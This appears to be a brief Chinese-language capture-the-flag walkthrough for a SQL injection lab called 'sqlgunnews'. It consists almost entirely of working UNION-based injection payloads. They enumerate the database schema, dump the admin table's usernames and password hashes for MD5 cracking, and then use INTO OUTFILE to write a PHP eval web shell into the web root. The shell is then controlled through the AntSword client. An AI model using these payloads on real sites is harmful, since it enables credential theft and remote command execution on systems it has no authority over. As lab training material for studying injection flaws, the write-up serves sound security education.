步骤一：打开页面

步骤二：测试回显点

-1'union select 1,2,3#

步骤三：查看数据库名

-1'union select 1,2,database()#

步骤四：查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

步骤五：查看列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

步骤六：查看账户和密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

md5解密

步骤七：扫描目录，有一个phpinfo.php文件，访问获取绝对路径

步骤八：.写入一句话木马，访问a.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/a

lsz.php' #

步骤九：进行蚁剑连接

根目录下flag